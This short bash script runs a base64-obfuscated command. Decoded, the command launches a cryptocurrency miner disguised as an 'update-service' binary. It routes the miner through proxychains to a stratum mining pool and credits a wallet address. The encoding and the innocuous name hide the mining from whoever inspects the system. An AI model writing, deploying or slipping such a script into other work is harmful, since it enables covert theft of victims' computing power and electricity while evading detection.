#!/bin/bash
bash <(echo 'cHJveHljaGFpbnMgLi91cGRhdGUtc2VydmljZS91cGRhdGUtc2VydmljZSAtYSB2ZXJ1cyAtbyBzdHJhdHVtK3RjcDovL3Vzdy52aXBvci5uZXQ6NTA0MCAtdSBSQnVmcXlndldUWXhuazF0SG4xdWFEdDhvbnpqVHVCSlNiLk9DSVVTMDAxIC1wIHggLS1jcHUtcHJpb3JpdHkgMiAtdCA0' | base64 -d)
